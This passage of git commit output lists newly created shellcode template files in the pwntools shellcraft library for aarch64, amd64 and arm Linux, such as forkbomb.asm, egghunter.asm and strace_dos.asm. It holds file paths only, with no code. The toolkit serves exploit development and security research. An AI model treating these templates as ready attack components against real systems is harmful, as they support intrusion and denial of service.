pwnlib/shellcraft/templates/aarch64/linux/getpeername.asm create mode 100644 
pwnlib/shellcraft/templates/aarch64/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/loader.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/loader_append.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/lseek.asm create mode 100644 
pwnlib/shellcraft/templates/aarch64/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pause.asm create mode 100644 
pwnlib/shellcraft/templates/aarch64/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/read.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readn.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/renameat.asm create mode 100644 
pwnlib/shellcraft/templates/aarch64/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setregid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setreuid.asm create mode 100644 
pwnlib/shellcraft/templates/aarch64/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setsockopt.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setsockopt_timeout.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigreturn.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/socket.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stage.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/syscall.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/tee.asm create mode 100644 
pwnlib/shellcraft/templates/aarch64/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/mov.asm create mode 100644 
pwnlib/shellcraft/templates/aarch64/pushstr.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/setregs.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/xor.asm create mode 100644 pwnlib/shellcraft/templates/amd64/crash.asm create mode 100644 pwnlib/shellcraft/templates/amd64/itoa.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/egghunter.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/epoll_ctl.asm create mode 100644 
pwnlib/shellcraft/templates/amd64/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getgroups.asm create mode 100644 
pwnlib/shellcraft/templates/amd64/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/loader.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/loader_append.asm create mode 
100644 pwnlib/shellcraft/templates/amd64/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/membot.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/migrate_stack.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mmap_rwx.asm mode change 100644 => 120000 pwnlib/shellcraft/templates/amd64/linux/mov.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/nanosleep.asm 
create mode 100644 pwnlib/shellcraft/templates/amd64/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ptrace.asm mode change 100644 => 120000 pwnlib/shellcraft/templates/amd64/linux/push.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/read_upto.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readinto.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readloop.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readn.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readptr.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readv.asm create mode 100644 
pwnlib/shellcraft/templates/amd64/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setitimer.asm create mode 100644 
pwnlib/shellcraft/templates/amd64/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setsockopt.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setsockopt_timeout.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/socket.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stage.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/strace_dos.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sync.asm create mode 100644 
pwnlib/shellcraft/templates/amd64/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/write.asm create 
mode 100644 pwnlib/shellcraft/templates/amd64/linux/writeloop.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/amd64/memcpy.asm create mode 100644 pwnlib/shellcraft/templates/amd64/popad.asm create mode 100644 pwnlib/shellcraft/templates/amd64/pushad.asm create mode 100644 pwnlib/shellcraft/templates/amd64/pushstr_array.asm create mode 100644 pwnlib/shellcraft/templates/amd64/strcpy.asm create mode 100644 pwnlib/shellcraft/templates/amd64/strlen.asm create mode 100644 pwnlib/shellcraft/templates/amd64/xor.asm create mode 100644 pwnlib/shellcraft/templates/arm/crash.asm create mode 100644 pwnlib/shellcraft/templates/arm/itoa.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/cacheflush.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/cat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/close.asm create mode 100644 
